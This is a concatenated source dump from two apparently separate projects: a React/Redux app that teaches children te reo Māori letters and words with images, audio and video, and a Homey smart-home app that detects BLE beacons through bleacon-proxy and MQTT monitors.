{id:1, image:'images/words/whatu.svg', sound: '/sounds/whatu.mp3', description: 'whatu'},
{id:2, image:'images/words/wheke.svg', sound: '/sounds/wheke.mp3', description: 'wheke'},
{id:3, image:'images/words/whare.svg', sound: 'sounds/whare.mp3', description: 'whare'},
],
multimedia: [
'/multimedia/wheke.webm',
'/multimedia/wheke.mp4',
'/multimedia/wheke.ogv'
],
mediaName: 'Wheke - Octopus',
},
{
id: 16,
capital: 'Ā',
lowercase: 'ā',
capitalSound: '/sounds/capitalSounds/AA.mp3',
lowerSound: '/sounds/lowerSounds/aa.mp3',
wordImage: [
{id:1, image:'images/words/aniwaniwa.svg', sound: '/sounds/aniwaniwa.mp3', description: 'āniwaniwa'},
{id:2, image:'images/words/aporo.svg', sound: '/sounds/aporo.mp3', description: 'āporo'},
{id:3, image:'images/words/arani.svg', sound: 'sounds/arani.mp3', description: 'ārani'},
],
multimedia: [ '/multimedia/aporo.webm',
'/multimedia/aporo.mp4',
'/multimedia/aporo.ogv'
],
mediaName: 'Āporo - apple',
},
{
id: 17,
capital: 'Ē',
lowercase: 'ē',
capitalSound: '/sounds/capitalSounds/EE.mp3',
lowerSound: '/sounds/lowerSounds/ee.mp3',
wordImage: [
{id:1, image:'images/words/weta.svg', sound: '/sounds/weta.mp3', description: 'wētā'},
{id:2, image:'images/words/ekara.svg', sound: '/sounds/ekara.mp3', description: 'ēkara'},
{id:3, image:'images/words/pekana.svg', sound: 'sounds/pekana.mp3', description: 'pēkana'},
],
multimedia: [
'/multimedia/ekara.webm',
'/multimedia/ekara.mp4',
'/multimedia/ekara.ogv'
],
mediaName: 'Ēkara - eagle',
},
{
id: 18,
capital: 'Ī',
lowercase: 'ī',
capitalSound: '/sounds/capitalSounds/II.mp3',
lowerSound: '/sounds/lowerSounds/ii.mp3',
wordImage: [
{id:1, image:'images/words/tihi.svg', sound: '/sounds/tihi.mp3', description: 'tīhi'},
{id:2, image:'images/words/kaki.svg', sound: '/sounds/kaki.mp3', description: 'kakī'},
{id:3, image:'images/words/miti.svg', sound: 'sounds/miti.mp3', description: 'mīti'},
],
multimedia: [
'/multimedia/kaki.webm',
'/multimedia/kaki.mp4',
'/multimedia/kaki.ogv'
],
mediaName: 'Kakī - neck',
},
{
id: 19,
capital: 'Ō',
lowercase: 'ō',
capitalSound: '/sounds/capitalSounds/OO.mp3',
lowerSound: '/sounds/lowerSounds/oo.mp3',
wordImage: [
{id:1, image:'images/words/totiti.svg', sound: '/sounds/totiti.mp3', description: 'tōtiti'},
{id:2, image:'images/words/netiporo.svg', sound: '/sounds/netiporo.mp3', description: 'netipōro'},
{id:3, image:'images/words/tohi.svg', sound: 'sounds/tohi.mp3', description: 'tōhi'},
],
multimedia: [
'/multimedia/netiporo.webm',
'/multimedia/netiporo.mp4',
'/multimedia/netiporo.ogv'
],
mediaName: 'Netipōro - Netball',
},
{
id: 20,
capital: 'Ū',
lowercase: 'ū',
capitalSound: '/sounds/capitalSounds/UU.mp3',
lowerSound: '/sounds/lowerSounds/uu.mp3',
wordImage: [
{id:1, image:'images/words/turu.svg', sound: '/sounds/turu.mp3', description: 'tūrū'},
{id:2, image:'images/words/purerehua.svg', sound: 'sounds/purerehua.mp3', description: 'pūrerehua'},
{id:3, image:'images/words/hapu.svg', sound: '/sounds/hapu.mp3', description: 'hapū'},
],
multimedia: [
'/multimedia/purerehua.webm',
'/multimedia/purerehua.mp4',
'/multimedia/purerehua.ogv',
],
mediaName: 'Pūrerehua - Butterfly',
},
],
letter: {},
completed: 0,
}
<file_sep>import React, { Component } from "react"
// Preload a single image URL: resolves with the URL once loaded, rejects
// with the URL on error.
const oneImage = url => {
  return new Promise((resolve, reject) => {
    const element = new Image()
    element.onload = () => {
      resolve(url)
    }
    element.onerror = () => {
      reject(url)
    }
    element.src = url
  })
}
// Preload a single audio URL: resolves with the Audio element once it can
// play through, rejects with the element on error.
const oneAudio = url => {
  return new Promise((resolve, reject) => {
    const element = new Audio()
    element.addEventListener("canplaythrough", () => {
      resolve(element)
    }, false)
    element.addEventListener("error", () => {
      reject(element)
    })
    element.src = url
    element.load()
  })
}
// Preload one URL or an array of URLs; arrays resolve once every item loads.
const image = url => {
  if (Array.isArray(url)) {
    return Promise.all(url.map(oneImage))
  }
  return oneImage(url)
}
const audio = url => {
  if (Array.isArray(url)) {
    return Promise.all(url.map(oneAudio))
  }
  return oneAudio(url)
}
class Preloader extends Component {
constructor(props) {
super(props)
this.state = { loading: true }
}
componentDidMount() {
this.load(this.props)
}
componentDidUpdate() {
this.load(this.props)
}
load({ images, audios }) {
Promise.all([
images ? image(images) : Promise.resolve(),
audios ? audio(audios) : Promise.resolve(),
]).then(([resultImages, resultAudios]) =>
this.setState({
loading: false,
images: resultImages.reduce(
(result, url, index) => ({ ...result, [url]: resultImages[index] }),
{},
),
audios: audios.reduce(
(result, url, index) => ({ ...result, [url]: resultAudios[index] }),
{},
),
}),
)
}
render() {
const { children } = this.props
const { loading, images, audios } = this.state
return <div>{loading ? <div className="loader" /> : children({ images, audios })}</div>
}
}
export default Preloader
<file_sep>import React from 'react'
import { connect } from 'react-redux'
import { Link } from 'react-router'
class Footer extends React.Component {
handleClick(e) {
e.preventDefault()
this.props.router.push('/')
}
render() {
return (
<div className='footer'>
<footer>
<Link to='/about' id='about'>
ABOUT US
</Link>
<Link to='/privacy' id='privacy'>
PRIVACY POLICY
</Link>
</footer>
</div>
)
}
}
module.exports = connect(state => state)(Footer)
<file_sep>import React from "react"
import { connect } from "react-redux"
import { Link } from "react-router"
class Header extends React.Component {
handleClick(e) {
e.preventDefault()
this.props.router.push("/")
}
render() {
return (
<div className="header">
<header>
<Link to="/">
<img id="header-logo" src="images/logo.svg" alt="logo" />
</Link>
<Link to="/media">
<img id="header-media" src="images/tv.png" alt="tv icon" />
</Link>
<Link to="/letters">
<img id="header-index" src="images/grid.png" alt="grid icon" />
</Link>
</header>
</div>
)
}
}
module.exports = connect(state => state)(Header)
<file_sep>// Note: Object.assign is another way of cloning the state.
// Check out: https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Object/assign
const initialState = require('../../state')
// Reducer for the currently selected letter.
// RENDER_LETTER shallow-merges the action payload into a fresh copy of the
// state; any other action returns the state unchanged.
// FIX: removed the stray console.log debug left in the RENDER_LETTER branch —
// reducers should be side-effect free.
function letterReducer(state = initialState.letter, action) {
  switch (action.type) {
    case 'RENDER_LETTER':
      return Object.assign({}, state, action.payload)
    default: return state
  }
}
module.exports = letterReducer
<file_sep>const debug = require('debug')('components:Letterindex')
const React = require('react')
const { connect } = require('react-redux')
const request = require('superagent')
const { Link} = require('react-router')
const NavLink = require('./NavLink.js')
class Letterindex extends React.Component {
constructor(){
super()
this.nextButton = this.nextButton.bind(this)
this.previousButton = this.previousButton.bind(this)
}
handleClick(e) {
e.preventDefault()
}
nextButton(letter,letters,dispatch){
const id = letters.findIndex(item =>{
return item.id === letter.id
})
if(id === (letters.length -1)){
this.props.router.push(`/letterindex/${letters[0].capital}`)
dispatch({
type: 'RENDER_LETTER',
payload: letters[0],
})
}
else {
this.props.router.push(`/letterindex/${letters[id+1].capital}`)
dispatch({
type: 'RENDER_LETTER',
payload: letters[id+1],
})
}
}
previousButton(letter,letters,dispatch){
const id = letters.findIndex(item =>{
return item.id ===letter.id
})
if(id === 0){
this.props.router.push(`/letterindex/${letters[letters.length-1].capital}`)
dispatch({
type: 'RENDER_LETTER',
payload: letters[letters.length-1],
})
}
else {
this.props.router.push(`/letterindex/${letters[id-1].capital}`)
dispatch({
type: 'RENDER_LETTER',
payload: letters[id-1],
})
}
}
render() {
debug(this.props)
const { dispatch, letters, letter } = this.props
const currentLetter = letter.capital
return (
<div>
<img id='back' src='../../images/back.gif' alt='back button'
onClick={()=>
this.previousButton(letter, letters, dispatch)}
/>
{
letters.map((letter) => {
return (
<NavLink
key={letter.id}
to={`/letterindex/${letter.capital}`}
activeClassName='active'>
<div
className='btn-group btn-group-lg btn-group-center wiggle-me'
role='group'
aria-label='...'>
<button
type='button'
className='btn'
onClick={() =>
dispatch({
type: 'RENDER_LETTER',
payload: letter,
})
}>
{letter.capital}
</button>
</div>
</NavLink>
)
})
}
<img id='next' src='../../images/next.gif' alt='next button'
onClick={()=>
this.nextButton(letter, letters, dispatch)}
/>
</div>
)
}
}
module.exports = connect(state => state)(Letterindex)
<file_sep>const { combineReducers } = require('redux')
const letter = require('./letter')
const letters = require('./letters')
const completed = require('./completed')
// Root reducer: the store shape is { letters, letter, completed }.
module.exports = combineReducers({
  letters,
  letter,
  completed,
})
<file_sep>Any developer wishing to contribute to this project is welcome to make a pull request which will be reviewed by the repo owners.
Thank you
<file_sep>const debug = require('debug')('components:Medialibrary')
import React from 'react'
import { connect } from 'react-redux'
import request from 'superagent'
import { Link } from 'react-router'
import Footer from './Footer'
import Header from './Header'
class Medialibrary extends React.Component {
handleClick(e) {
e.preventDefault()
}
render() {
debug(this.props)
const { dispatch, letters } = this.props
return (
<div className='medialibrary-container'>
<Header />
<div className='medialibrary-box'>
<h2>Ataata</h2>
<hr />
<h3>Choose a video to watch</h3>
<div className="medialibrary-images">
{
letters.map((letter, index) => {
return (
<div className='media-image' key={index}>
<Link key={letter.id} to={`/media/${letter.capital}`}>
<img
key={index}
src={`${letter.wordImage[1].image}`}
className='img-fluid'
onClick={() =>
dispatch({
type: 'RENDER_LETTER',
payload: letter,
})
} />
</Link>
</div>
)
})
}
</div>
</div>
<Footer />
</div>
)
}
}
module.exports = connect(state => state)(Medialibrary)
<file_sep># <NAME> - Learn te reo Māori Phonics
This app is aimed at Primary aged children, as a tool to help them learn te reo Māori phonics and high-usage words.
## Instructions for use on a local directory
Clone the repo into your workspace.
In the KoreroMai2 directory: npm i
To run the app in development use Node and in the terminal: npm run dev
To see the app in action: localhost:3000
or go to Heroku hosted web app: https://koreromai.maori.nz
# Using the App
The app is a simple library of the Māori alphabet, with some related multimedia files.
The user simply clicks on a letter they want to learn. They will see a page with the capital form, the lowercase form, and some images/words showing the letter in context. The letters and images can all be clicked on, and the user will hear the letter or word pronounced in te reo Māori. This can be repeated as many times as needed to learn the correct pronunciation.
## Purpose
This app came about from a need for more digital teaching resources to help younger audiences learn the basics of a new language. Phonics is a building block for language, and the learning of which enables the user to move on to more complex words, grammar and other language features.
## Target audience
This app has specifically been designed for Primary school children, which in New Zealand is the ages between 5 - 9 years.
## Development Installations
- If you're on linux:
- Install ruby: sudo apt-get install ruby-full
- Install Sass: sudo su -c "gem install sass"
- once downloaded: npm i
<file_sep>const express = require('express')
const path = require('path')
const logger = require('morgan')
const bodyParser = require('body-parser')
const api = require('./api')
module.exports = () => {
const app = express()
app.use(logger('dev'))
app.use(bodyParser.json())
app.use(bodyParser.urlencoded(
{ extended: false }))
app.set('trust proxy', 1) // trust first proxy
if (app.get('env') === 'development') {
const webpackDevMiddleware = require('webpack-dev-middleware')
const config = require('./webpack.config')
const webpack = require('webpack')
const compiler = webpack(config)
const livereload = require('livereload')
const lrserver = livereload.createServer()
lrserver.watch([
__dirname + '/public',
__dirname + '/src',
])
app.use(require('inject-lr-script')())
app.use(webpackDevMiddleware(compiler, {
noInfo: true,
publicPath: config.output.publicPath,
}))
}
// static files
app.use('/', express.static(path.join(__dirname, 'public')))
// routes
app.use('/api/v1/', api.appRoute())
// catch 404 and forward to error handler
app.use((req, res, next) => {
const err = new Error('Not Found')
err.status = 404
next(err)
})
// error handlers
// development error handler
// will print stacktrace
if (app.get('env') === 'development') {
app.use((err, req, res) => {
res.status(err.status || 500)
res.json({
message: err.message,
error: err,
})
})
}
// production error handler
// no stacktraces leaked to user
app.use((err, req, res) => {
res.status(err.status || 500)
res.json({
message: err.message,
error: {},
})
})
return app
}
<file_sep>import React from "react"
import { connect } from "react-redux"
import { browserHistory } from "react-router"
import { Player } from "video-react"
import Footer from "./Footer.js"
import Header from "./Header.js"
import "../../node_modules/video-react/dist/video-react.css" // import css
const debug = require("debug")("components:Mediashow")
class Mediashow extends React.Component {
handleClick(e) {
e.preventDefault()
this.props.router.push("/")
}
render() {
debug(this.props)
const { letter } = this.props
return (
<div className="container">
<Header />
<div className="video-box">
<h2>Mātaki mai</h2>
<div className="video">
<Player playsInline src={letter.multimedia[1]} type="video/mp4" />
</div>
<div>
<img
src="../../images/previous.png"
alt="back button"
onClick={browserHistory.goBack}
className="mediabackbutton"
/>
</div>
</div>
<Footer />
</div>
)
}
}
module.exports = connect(state => state)(Mediashow)
<file_sep>import React from "react"
import { connect } from "react-redux"
import { Link } from "react-router"
import Footer from "./Footer"
import Header from "./Header"
import Preloader from "./Preloader"
import ButtonLink from "./ButtonLink"
const debug = require("debug")("components:Displayletter")
const IMAGES = {
click: "/images/click.svg",
listen: "/images/listen.svg",
next: "/images/next.png",
previous: "/images/previous.png",
play: "/images/play.png",
}
const play = sound => () => {
sound.play()
}
const Words = ({ items = [] }) => (
<Preloader images={items.map(({ image }) => image)} audios={items.map(({ sound }) => sound)}>
{({ images, audios }) => (
<div style={{ minHeight: "200px" }} className="words-box">
{items.map(word => (
<div className="split-words" key={word.id}>
{images[word.image] ? (
<ButtonLink className="wordImage" onClick={play(audios[word.sound])}>
<img src={images[word.image]} alt={word.description} />
</ButtonLink>
) : (
<div className="spinner wordImage" />
)}
<p className="wordDescription">{word.description}</p>
</div>
))}
</div>
)}
</Preloader>
)
class DisplayLetter extends React.Component {
constructor() {
super()
this.go = this.go.bind(this)
this.getLetterIndex = this.getLetterIndex.bind(this)
}
getLetterIndex() {
const { letters, letter } = this.props
return letters.findIndex(item => item.id === letter.id)
}
go(direction) {
const { renderLetter, letters } = this.props
const index = this.getLetterIndex()
const nextIndex =
direction === "next"
? index === letters.length - 1
? 0
: index + 1
: index === 0
? letters.length - 1
: index - 1
const nextLetter = letters[nextIndex]
return () => {
this.props.router.push(`/letters/${nextLetter.capital}`)
renderLetter(nextLetter)
}
}
render() {
debug(this.props)
const { letter } = this.props
return (
<div className="container">
<Header />
<Preloader
images={[IMAGES.click, IMAGES.listen, IMAGES.previous, IMAGES.next, IMAGES.play]}
audios={[letter.capitalSound, letter.lowerSound]}
>
{({ images, audios }) => (
<div className="letter-box">
<div className="letters">
<ButtonLink onClick={this.go("previous")}>
<img id="previous-letter" src={images[IMAGES.previous]} alt="back button" />
</ButtonLink>
<p>Click on the letters and pictures</p>
<img src={images[IMAGES.click]} alt="click" width="30px" id="click-icon" />
<img src={images[IMAGES.listen]} alt="listen" width="30px" id="listen-icon" />
<ButtonLink className="letter-button" onClick={play(audios[letter.capitalSound])}>
{letter.capital}
</ButtonLink>
<ButtonLink className="letter-button" onClick={play(audios[letter.lowerSound])}>
{letter.lowercase}
</ButtonLink>
<ButtonLink onClick={this.go("next")}>
<img id="next-letter" src={images[IMAGES.next]} alt="next button" />
</ButtonLink>
</div>
<div className="word-container">
<Words items={letter.wordImage} />
<Link key={letter.id} to={`/media/${letter.capital}`}>
<img src={images[IMAGES.play]} alt="play" id="media-play" />
</Link>
</div>
</div>
)}
</Preloader>
<Footer />
</div>
)
}
}
export default connect(
({ letters }, { routeParams }) => ({
letters,
letter:
routeParams.id &&
letters.find(letter => letter.capital.toUpperCase() === routeParams.id.toUpperCase()),
}),
dispatch => ({
renderLetter: letter => dispatch({ type: "RENDER_LETTER", payload: letter }),
}),
)(DisplayLetter)
<file_sep>const debug = require('debug')('components:Privacy')
import React from 'react'
import { connect } from 'react-redux'
import { Link } from 'react-router'
import Footer from './Footer'
import Header from './Header'
class Privacy extends React.Component {
handleClick(e) {
e.preventDefault()
this.props.router.push('/')
}
render() {
debug(this.props)
return (
<div className='privacy-container'>
<Header />
<div className='privacy-box'>
<h2 className='privacy-heading'>Kōrero Mai Privacy Policy</h2>
<div className='privacy-articles'>
<p className='opening'>Your privacy on the Internet is important to us.
This privacy policy discloses what information we gather,
how we use it, and how to correct or change it.</p>
<h3>Information</h3>
<p className='article'>We do not gather or store any personal information from users of this web app, other than personal information, provided to us by
you through correspondence
and/or discussions.</p>
<h3>Security</h3>
<p className='article'>We are committed to ensuring that
your information is secure.
In order to prevent unauthorised access or disclosure we have put in place suitable physical, electronic and managerial procedures to safeguard and secure any personal information collected.</p>
<h3>Use of your information</h3>
<p className='article'>We will never sell or rent your
personal information to third parties. We will use information we collect from you for the primary purpose for which it is collected and for such other
secondary purposes that are related to the primary purpose of collection.</p>
<h3>Email Newsletters and other notices</h3>
<p className='article'>It is our policy to send only emails you elect to receive in a sign-up process. In addition, we may send out promotional material to you promoting new or amended material on our site where we
think that may be relevant to you. It is our policy to immediately remove any person from any mailing list upon the person’s request.</p>
<h3>Access and removal of Information</h3>
<p className='article'>You have the right to seek access to the personal information held about you and to advise us of any inaccuracy. There are some exceptions to this right set out in the Privacy Act. If you make an
access request, we will ask you to verify your identity and specify what information you require.</p>
<h3>Updates to our information practices</h3>
<p className='article'>We reserve the right to change this policy. By continuing to use the Website, you agree to be bound by the amended policy. You should check from time to time to see if the policy has changed.</p>
</div>
<img src='../../images/words/tohora.svg' alt='tohora - whale' className='privacy-tohora'/>
</div>
<Footer />
</div>
)
}
}
module.exports = connect(state => state)(Privacy)
<file_sep>import React from "react"
import { connect } from "react-redux"
import { Link } from "react-router"
// Needed for onTouchTap
import injectTapEventPlugin from "react-tap-event-plugin"
injectTapEventPlugin()
class Home extends React.Component {
handleClick(e) {
e.preventDefault()
this.props.router.push("/")
}
render() {
return (
<div className="container">
<div className="home-box">
<img src="./images/logo.svg" alt="logo" className="logoImage" />
<br />
<img src="./images/girl.svg" alt="girl" className="kidImage" />
<img src="./images/boy.svg" alt="boy" className="kidImage" />
<h2>
Nau mai, Haere mai <br /> Welcome
</h2>
<h3>
Kia Ora! Hi! <br /> Let's learn Te Reo Māori
</h3>
<Link to="/letters">
<button className="play">Play!</button>
</Link>
<br />
<div className="imgWrapper">
<img src="./images/words/anuhe.svg" alt="caterpillar" className="hmImage" />
<img src="./images/words/ekara.svg" alt="eagle" className="hmImage" />
<img src="./images/words/koura.svg" alt="crayfish" className="hmImage" />
</div>
</div>
</div>
)
}
}
module.exports = connect(state => state)(Home)
| f5794aac6105a0647cd613a11024478c82db32f1 | [
"JavaScript",
"Markdown"
] | 16 | JavaScript | ManuInnovations/KoreroMai2 | c05bf2efaa6bd7f3bc8b5bb9c5e49265f2871999 | ff76290afa96c78abd81630a6e27f750e79f15ad |
refs/heads/master | <file_sep># BLE Beacons
Adds support for detecting BLE beacons (iBeacons, Eddystone, etc)
## Monitor support
- [Bleacon-proxy](https://www.npmjs.com/package/bleacon-proxy)
- [happy-bubbles](https://www.happybubbles.tech/presence/)
- Homey (todo)
### TODO
- [x] iBeacons
- [x] Raspberry Pi / bleacon monitor
- [x] Beacons as devices
- [x] happy-bubbles monitor
- [x] prevent duplicate devices
- [x] bleacon ip change (manual)
- [x] Eddystone beacons
- [ ] bleacon rediscovery
- [ ] closest beacon detection
- [ ] more flow cards
- [ ] native Homey monitor
- [ ] 3D multilateration
- [ ] 3D floorplan
- [ ] raw beacons / BLE advertisements<file_sep>'use strict';
const MonitorDriver = require('../lib/MonitorDriver');
const BleaconProxyClient = require('./BleaconProxyClient');
class BleaconDriver extends MonitorDriver {
onPair( socket ) {
socket.on('list_devices', async ( data, callback ) => {
let result = [];
await this.constructor.discover((dev) => {
if(this.getDeviceByMonitorId(dev.data.id)) return;
result.push(dev);
socket.emit('list_devices', result );
});
callback(null, result);
return result;
});
}
static discoverDevToHomeyDev(dev) {
return {
name: dev.name,
settings: {
host: dev.address,
port: dev.port
},
data: {
id: dev.id
}
};
}
static async discover(enumerate) {
enumerate = enumerate || ( () => {} );
const devs = await BleaconProxyClient.discover(15000, (dev) => enumerate(this.discoverDevToHomeyDev(dev)));
return devs.map(this.discoverDevToHomeyDev);
}
}
module.exports = BleaconDriver;<file_sep>'use strict';
const {EventEmitter} = require('events');
const sConstructors = Symbol();
class Beacon extends EventEmitter {
constructor() {
super();
this._lastUpdated = new Date();
this._monitors = {};
}
get uniqueId() {
throw new Error('unimplemented');
}
getProximity(monitor) {
throw new Error('unimplemented');
}
_getMonitorData(monitor) {
return this._monitors[monitor.monitorID];
}
getRSSI(monitor) {
const monitorData = this._getMonitorData(monitor) || {};
return monitorData.rssi;
}
onJoin(monitor, first) {
this._monitors[monitor.monitorID] = {monitor};
this.emit('join', monitor, this, first);
return this._monitors[monitor.monitorID];
}
onLeave(monitor, last) {
delete this._monitors[monitor.monitorID];
this.emit('leave', monitor || this._monitor, this, last);
}
onProximityChange(monitor, monitorData) {
let now = new Date();
if(!monitorData.lastProximityChange || now - monitorData.lastProximityChange > 1000) {
monitorData.lastProximityChange = now;
monitorData.lastReportedProximity = this.getProximity(monitor);
this.emit('proximityChanged', monitor, this);
}
else if(monitorData.lastReportedProximity === this.getProximity(monitor)) {
monitorData.lastProximityChange = now;
}
}
updateData(monitor, data) {
let monitorData = this._getMonitorData(monitor);
if(!monitorData) monitorData = this.onJoin(monitor, Object.keys(this._monitors).length < 1);
monitorData.rssi = data.rssi;
this.onProximityChange(monitor, monitorData);
monitorData.lastUpdated = new Date();
}
get type() {
throw new Error('unimplemented');
}
get lastUpdated() {
return this._lastUpdated;
}
tick(now) {
Object.values(this._monitors).forEach(monitorData => {
if(now - monitorData.lastUpdated > 3000) {
this.onLeave(monitorData.monitor, Object.keys(this._monitors).length <= 1);
}
});
}
static _addType(type, name, constructor) {
this.types = this.types || {};
this[sConstructors] = this[sConstructors] || {};
this.types[type] = name;
this[sConstructors][name] = constructor;
}
static makeBeacon(type, id, data) {
if(!this[sConstructors][type]) throw new TypeError('Invalid beacon type');
return new this[sConstructors][type](id, data);
}
}
module.exports = Beacon;
Beacon._addType('IBEACON', 'iBeacon', require('./beacons/iBeacon'));
Beacon._addType('EDDYSTONE', 'Eddystone', require('./beacons/Eddystone'));<file_sep>'use strict';
const dgram = require('dgram');
const {EventEmitter} = require('events');
const net = require('net');
const readline = require('readline');
const PING_INTERVAL = 15000;
const RETRY_INTERVAL = 15000;
class BleaconProxyDriver extends EventEmitter {
constructor(port, host) {
super();
this.port = port;
this.host = host;
}
/**
* Connects to the bleacon proxy
*/
connect() {
this.disconnect();
this._client = new net.Socket();
this._client.connect(this.port, this.host, () => {
this._startPing();
this.connected = true;
this.emit('available');
});
readline.createInterface({
input: this._client
}).on('line', this._onBeacon.bind(this));
this._client.on('close', () => {
if(this.connected) {
this.disconnect();
}
setTimeout(() => this.connect(), RETRY_INTERVAL); //retry after 15 seconds
});
this._client.on('error', (err) => {
this.emit('error', err);
});
}
_startPing() {
this._stopPing();
this._pingInterval = setInterval(this.ping.bind(this), PING_INTERVAL);
}
ping() {
if(!this._client) return;
this._client.write("ping");
}
_stopPing() {
if(this._pingInterval) clearInterval(this._pingInterval);
}
disconnect() {
this._stopPing();
if(!this._client) return;
this._client.removeAllListeners();
this._client.destroy();
if(this.connected) {
this.connected = false;
this.emit('unavailable');
}
delete this._client;
}
_onBeacon(beacon) {
try {
beacon = JSON.parse(beacon);
} catch(e) { return; }
this.emit('discover_ibeacon', beacon);
}
/**
* Scans for <timeout>ms and calls enumerate whenever a new device is discovered.
* Resolves with an array of discovered devices
* @param {number} timeout - time to scan for
* @param {function} enumerate callback (gets called multiple times
*/
static async discover(timeout, enumerate) {
enumerate = enumerate || ( () => {} );
const client = dgram.createSocket('udp4');
const result = [];
client.on('listening', () => {
client.setBroadcast(true);
client.send(JSON.stringify({
type: 'bleacon-discover'
}), 1337, '255.255.255.255');
});
client.on('message', (dev, rinfo) => {
try {
dev = JSON.parse(dev);
if(dev.type === 'bleacon-discover') {
dev.address = rinfo.address;
enumerate(dev);
result.push(dev);
}
} catch(e) {
console.error(e);
}
});
client.on('error', (err) => {
console.error(err);
});
client.bind();
return new Promise((resolve) => {
setTimeout(() => {
client.close();
client.removeAllListeners();
resolve(result);
}, timeout);
});
}
}
module.exports = BleaconProxyDriver;<file_sep>'use strict';
const {Homey} = require('homey-mock');
const BleaconDriver = require('../drivers/bleacon-proxy/driver.js');
let first = true;
BleaconDriver.discover((dev) => {
if(!first) return;
first = false;
console.log(dev);
const driver = new BleaconDriver('bleacon-proxy', [dev]);
});<file_sep>'use strict';
const { EventEmitter } = require('events');
const util = require('./util');
const Beacon = require('./Beacon');
class BeaconManager extends EventEmitter {
constructor() {
super();
this._beacons = {};
setInterval(this._tick.bind(this), 3000);
}
getCurrentBeacons() {
return this._beacons;
}
async testBeacon(args, state) {
console.log(arguments);
//TODO
return true;
}
updateBeacon(type, monitor, id, data) {
if(!this._beacons[id]) this._beacons[id] = this.makeBeacon(type, monitor, id, data);
this._beacons[id].updateData(monitor, data);
}
makeBeacon(type, monitor, id, data) {
const beacon = Beacon.makeBeacon(type, id, data);
beacon.on('join', this.onBeaconJoin.bind(this));
beacon.on('proximityChanged', this.onBeaconProximityChange.bind(this));
beacon.on('leave', this.onBeaconLeave.bind(this));
return beacon;
}
onBeaconJoin(monitor, beacon, first) {
console.log('beacon join', monitor.monitorID, beacon.uniqueId, first);
//TODO: generic flow cards
this.emit('join', monitor, beacon, first);
}
onBeaconProximityChange(monitor, beacon) {
console.log('beacon proximity', monitor.monitorID, beacon.uniqueId, beacon.getProximity(monitor));
//TODO: generic flow cards
this.emit('proximityChange', monitor, beacon);
}
onBeaconLeave(monitor, beacon, last) {
console.log('beacon leave', monitor.monitorID, beacon.uniqueId, last);
//TODO: generic flow cards
this.emit('leave', monitor, beacon, last);
if(last) {
beacon.removeAllListeners();
delete this._beacons[beacon.uniqueId];
}
}
_tick() {
let now = new Date()
Object.values(this._beacons).forEach( (beacon) => beacon.tick(now) );
}
}
module.exports = new BeaconManager();<file_sep>'use strict';
const mqtt = require('async-mqtt');
const {ApiApp, manifest} = require('homey');
const {delay} = require('./util');
const MQTT_CONNECT_TIMEOUT = 7000;
class MQTTManager {
constructor() {
this._connections = {};
}
async getLocalBrokerInfo() {
try {
const brokerApi = new ApiApp('nl.scanno.mqttbroker');
if(! await brokerApi.getInstalled()) throw new Error('broker_not_installed');
const info = await brokerApi.get('/app2app/info');
info.username = manifest.id;
info.password = '<PASSWORD>'; //TODO
info.protocol = info.tls ? 'tls': 'tcp';
info.hostname = 'localhost';
await brokerApi.put('/app2app/user', {
userName: info.username,
userPassword: <PASSWORD>,
});
return info;
} catch(e) {
throw new Error('broker_not_installed');
}
}
async connectLocal() {
const info = await this.getLocalBrokerInfo();
info.rejectUnauthorized = info.hasOwnProperty('selfSigned') && !info.selfSigned;
const client = mqtt.connect(info);
client.on('error', console.log);
return new Promise((resolve, reject) => {
client.once('connect', () => resolve(client));
delay(MQTT_CONNECT_TIMEOUT).then(() => reject(new Error('timeout')));
});
}
async getConnection(id, opts) {
if(this._connections[id]) return this._connections[id];
if(id === 'local')
return this._connections[id] = this.connectLocal();
throw new Error('unimplemented');
}
}
module.exports = new MQTTManager();<file_sep>'use strict';
const BleaconProxyClient = require('./BleaconProxyClient');
const MonitorDevice = require('../lib/MonitorDevice');
const Beacon = require('../../lib/Beacon');
const util = require('../../lib/util');
class BleaconDevice extends MonitorDevice {
onInit() {
this.connect();
}
onDeleted() {
this.disconnect();
}
setAvailable() {
super.setAvailable();
this.log('Connected');
}
setUnavailable() {
super.setUnavailable();
this.log('Disconnected');
}
_onConnectionError(err) {
this.error(err.message);
}
connect() {
if(!this._client) {
this._client = new BleaconProxyClient(this.port, this.host);
this._client.on('available', this.setAvailable.bind(this));
this._client.on('unavailable', this.setUnavailable.bind(this));
this._client.on('discover_ibeacon', this._onMeasure.bind(this));
this._client.on('error', this._onConnectionError.bind(this));
}
this.log('Connecting...');
this._client.connect();
}
disconnect() {
if(!this._client) return;
this.log('Disconnecting...');
this._client.disconnect();
this._client.removeAllListeners();
delete this._client;
}
_onMeasure(beacon) {
let uniqueId = util.iBeaconUniqueId(beacon.uuid, beacon.major, beacon.minor);
this.updateBeacon(Beacon.types.IBEACON, uniqueId, beacon);
}
get host() {
return this.getSetting('host');
}
get port() {
return this.getSetting('port');
}
get monitorID() {
return this.getData().id;
}
}
module.exports = BleaconDevice;<file_sep>'use strict';
const { Driver, FlowCardTriggerDevice } = require('homey');
const BeaconManager = require('../../lib/BeaconManager');
class BeaconDriver extends Driver {
getDeviceByBeaconId(id) {
return this.getDevices().filter(dev => dev.getData().id === id).pop();
}
onInit() {
// register the card
this._beaconJoinTrigger = new FlowCardTriggerDevice('beacon_range_enter');
this._beaconJoinTrigger
.register();
// register the card
this._beaconProximityTrigger = new FlowCardTriggerDevice('beacon_range_proximity');
this._beaconProximityTrigger
.registerRunListener(async (args, state) => {
return args.monitor.monitorID === state.monitorID;
})
.register();
// register the card
this._beaconLeaveTrigger = new FlowCardTriggerDevice('beacon_range_leave');
this._beaconLeaveTrigger
.register();
BeaconManager.on('join', this.onBeaconJoin.bind(this));
BeaconManager.on('proximityChange', this.onBeaconProximityChange.bind(this));
BeaconManager.on('leave', this.onBeaconLeave.bind(this));
}
onBeaconJoin( monitor, beacon, first ) {
let device = this.getDeviceByBeaconId(beacon.uniqueId);
if(!device || !first) return; //TODO add monitor-specific card
this._beaconJoinTrigger.trigger(device);
}
onBeaconProximityChange(monitor, beacon) {
let device = this.getDeviceByBeaconId(beacon.uniqueId);
if(!device) return;
this._beaconProximityTrigger.trigger(device, {proximity: beacon.getProximity(monitor)}, {monitorID: monitor.monitorID});
}
onBeaconLeave(monitor, beacon, last) {
let device = this.getDeviceByBeaconId(beacon.uniqueId);
if(!device || !last) return; //TODO add monitor-specific card
this._beaconLeaveTrigger.trigger(device);
}
onPair( socket ) {
socket.on('list_devices', async ( data, callback ) => {
let result = [];
await this.constructor.discover((devices) => {
result = devices;
socket.emit('list_devices', result );
});
callback(null, result);
return result;
});
}
static fetchBeacons() {
